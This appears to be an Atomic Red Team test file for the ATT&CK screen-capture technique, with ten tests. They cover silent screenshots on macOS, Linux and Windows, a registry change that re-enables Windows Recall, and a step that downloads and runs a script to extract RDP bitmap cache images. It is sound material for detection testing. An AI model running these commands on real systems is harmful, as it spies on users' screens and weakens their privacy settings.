atomic-red-team/atomics/T1113/T1113.md

# T1113 - Screen Capture

## Description from ATT&CK

> Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)

[Source](https://attack.mitre.org/techniques/T1113)

## Atomic Tests

- [Atomic Test #1: Screencapture](#atomic-test-1-screencapture)
- [Atomic Test #2: Screencapture (silent)](#atomic-test-2-screencapture-silent)
- [Atomic Test #3: X Windows Capture](#atomic-test-3-x-windows-capture)
- [Atomic Test #4: X Windows Capture (freebsd)](#atomic-test-4-x-windows-capture-freebsd)
- [Atomic Test #5: Capture Linux Desktop using Import Tool](#atomic-test-5-capture-linux-desktop-using-import-tool)
- [Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd)](#atomic-test-6-capture-linux-desktop-using-import-tool-freebsd)
- [Atomic Test #7: Windows Screencapture](#atomic-test-7-windows-screencapture)
- [Atomic Test #8: Windows Screen Capture (CopyFromScreen)](#atomic-test-8-windows-screen-capture-copyfromscreen)
- [Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted](#atomic-test-9-windows-recall-feature-enabled---disableaidataanalysis-value-deleted)
- [Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools](#atomic-test-10-rdp-bitmap-cache-extraction-via-bmc-tools)

### Atomic Test #1: Screencapture

Use screencapture command to collect a full desktop screenshot

**Supported Platforms:** macOS

**auto_generated_guid:** `0f47ceb1-720f-4275-96b8-21f0562217ac`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | path | /tmp/T1113_desktop.png|

#### Attack Commands: Run with `bash`!

```bash
screencapture #{output_file}
```

#### Cleanup Commands

```bash
rm #{output_file}
```
### Atomic Test #2: Screencapture (silent)

Use screencapture command to collect a full desktop screenshot

**Supported Platforms:** macOS

**auto_generated_guid:** `deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | path | /tmp/T1113_desktop.png|

#### Attack Commands: Run with `bash`!

```bash
screencapture -x #{output_file}
```

#### Cleanup Commands

```bash
rm #{output_file}
```
### Atomic Test #3: X Windows Capture

Use xwd command to collect a full desktop screenshot and review file with xwud

**Supported Platforms:** Linux

**auto_generated_guid:** `8206dd0c-faf6-4d74-ba13-7fbe13dce6ac`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd|
| package_checker | Package checking command for linux. Debian system command- dpkg -s x11-apps | string | rpm -q xorg-x11-apps|
| package_installer | Package installer command for linux. Debian system command- apt-get install x11-apps | string | yum install -y xorg-x11-apps|

#### Attack Commands: Run with `bash`!

```bash
xwd -root -out #{output_file}
xwud -in #{output_file}
```

#### Cleanup Commands

```bash
rm #{output_file}
```

#### Dependencies: Run with `bash`!

##### Description: Package with XWD and XWUD must exist on device

###### Check Prereq Commands

```bash
if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
```

###### Get Prereq Commands

```bash
sudo #{package_installer}
```

### Atomic Test #4: X Windows Capture (freebsd)

Use xwd command to collect a full desktop screenshot and review file with xwud

**Supported Platforms:** Linux

**auto_generated_guid:** `562f3bc2-74e8-46c5-95c7-0e01f9ccc65c`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | path | /tmp/T1113_desktop.xwd|

#### Attack Commands: Run with `sh`!

```sh
xwd -root -out #{output_file}
xwud -in #{output_file}
```

#### Cleanup Commands

```sh
rm #{output_file}
```

#### Dependencies: Run with `sh`!

##### Description: Package with XWD and XWUD must exist on device

###### Check Prereq Commands

```sh
if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi
if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi
```

###### Get Prereq Commands

```sh
pkg install -y xwd xwud
```

### Atomic Test #5: Capture Linux Desktop using Import Tool

Use import command from ImageMagick to collect a full desktop screenshot

**Supported Platforms:** Linux

**auto_generated_guid:** `9cd1cccb-91e4-4550-9139-e20a586fcea1`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | path | /tmp/T1113_desktop.png|

#### Attack Commands: Run with `bash`!

```bash
import -window root #{output_file}
```

#### Cleanup Commands

```bash
rm #{output_file}
```

#### Dependencies: Run with `bash`!

##### Description: ImageMagick must be installed

###### Check Prereq Commands

```bash
if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
```

###### Get Prereq Commands

```bash
sudo apt install graphicsmagick-imagemagick-compat
```

### Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd)

Use import command from ImageMagick to collect a full desktop screenshot

**Supported Platforms:** Linux

**auto_generated_guid:** `18397d87-38aa-4443-a098-8a48a8ca5d8d`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | path | /tmp/T1113_desktop.png|

#### Attack Commands: Run with `sh`!

```sh
import -window root #{output_file}
```

#### Cleanup Commands

```sh
rm #{output_file}
```

#### Dependencies: Run with `sh`!

##### Description: ImageMagick must be installed

###### Check Prereq Commands

```sh
if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi
```

###### Get Prereq Commands

```sh
pkg install -y ImageMagick7
```

### Atomic Test #7: Windows Screencapture

Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour

**Supported Platforms:** Windows

**auto_generated_guid:** `3c898f62-626c-47d5-aad2-6de873d69153`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Output file path | path | c:&#92;temp&#92;T1113_desktop.zip|
| recording_time | Time to take screenshots | integer | 5|

#### Attack Commands: Run with `powershell`!

```powershell
cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
```

#### Cleanup Commands

```powershell
rm #{output_file} -ErrorAction Ignore
```
### Atomic Test #8: Windows Screen Capture (CopyFromScreen)

Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen

**Supported Platforms:** Windows

**auto_generated_guid:** `e9313014-985a-48ef-80d9-cde604ffc187`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | $env:TEMP&#92;T1113.png|

#### Attack Commands: Run with `powershell`!

```powershell
Add-Type -AssemblyName System.Windows.Forms
$screen = [Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
$graphic = [Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save("#{output_file}")
```

#### Cleanup Commands

```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
### Atomic Test #9: Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted

Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary. 
- https://learn.microsoft.com/en-us/windows/client-management/manage-recall
- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis

**Supported Platforms:** Windows

**auto_generated_guid:** `5a496325-0115-4274-8eb9-755b649ad0fb`

#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /f
```

#### Cleanup Commands

```powershell
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 1 /f
```
### Atomic Test #10: RDP Bitmap Cache Extraction via bmc-tools

Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).

**Supported Platforms:** Windows

**auto_generated_guid:** `98f19852-7348-4f99-9e15-6ff4320464c7`

#### Inputs

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| cache_path | Path to the RDP Cache directory or specific .bmc file | path | $env:LOCALAPPDATA&#92;Microsoft&#92;Terminal Server Client&#92;Cache|
| output_dir | Directory to save reconstructed images | path | $env:TEMP&#92;rdp_screens|

#### Attack Commands: Run with `powershell`!

```powershell
$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'
$toolsDir = "$env:TEMP\bmc-tools.py"
 
# create output directory
New-Item -ItemType Directory -Path #{output_dir} -Force | Out-Null

# python script download
& curl.exe -L $url --output $toolsDir
 
# execution step
if (Test-Path $toolsDir) { python $toolsDir -s "#{cache_path}" -d #{output_dir} -b }
```

#### Cleanup Commands

```powershell
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
```

#### Dependencies: Run with `powershell`!

##### Description: Python must be installed and in the PATH to run bmc-tools.py

###### Check Prereq Commands

```powershell
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
Write-Host "Please install Python manually."
```